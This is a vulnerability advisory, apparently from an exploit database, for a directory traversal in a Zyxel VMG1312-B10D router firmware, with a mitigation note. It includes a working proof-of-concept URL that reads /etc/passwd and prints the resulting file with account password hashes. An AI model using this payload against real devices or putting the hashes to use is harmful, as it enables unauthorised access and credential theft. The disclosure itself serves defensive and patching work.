Zyxel VMG1312-B10D 5.13AAXA.8 - Directory Traversal

vendor:

VMG1312-B10D

by:

numan türle

7.5

CVSS

HIGH

Directory Traversal

CWE

Product Name: VMG1312-B10D

Affected Version From: 5.13AAXA.8

Affected Version To: 5.13AAXA.8

Patch Exists: YES

Related CWE: N/A

CPE: h:zyxel:vmg1312-b10d

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: macOS

2018

Zyxel VMG1312-B10D 5.13AAXA.8 – Directory Traversal

A directory traversal vulnerability exists in Zyxel VMG1312-B10D 5.13AAXA.8. An attacker can send a specially crafted HTTP request to the vulnerable device to view the contents of the /etc/passwd file.

Mitigation:

Upgrade to the latest version of the firmware (5.13(AAXA.8)C0)

Source

Exploit-DB raw data:

# Exploit Title: Zyxel VMG1312-B10D 5.13AAXA.8 - Directory Traversal
# Date: 2018-11-17
# Exploit Author: numan türle
# Vendor Homepage: https://www.zyxel.com/
# Software Link: https://www.zyxel.com/products_services/Wireless-N-VDSL2-4-port-Gateway-with-USB-VMG1312-B10D/
# Tested on: macOS
# Fixed firmware: 5.13(AAXA.8)C0

# PoC
@modem_gateway = "192.168.1.1" // default address

http://@modem_gateway/../../../../../../../../../../../../etc/passwd

here are the contents :

############################## contents ##############################
nobody:x:99:99:nobody:/nonexistent:/bin/false
root:zKtrESdI2DPME:0:0:root:/home/root:/bin/sh
supervisor:.t7H3bCRtJ6UY:12:12:supervisor:/home/supervisor:/bin/sh
admin:avHcRxJLoXvas:21:21:admin:/home/admin:/bin/sh
user:AebeEcyKDnOzI:31:31:user:/home/user:/bin/sh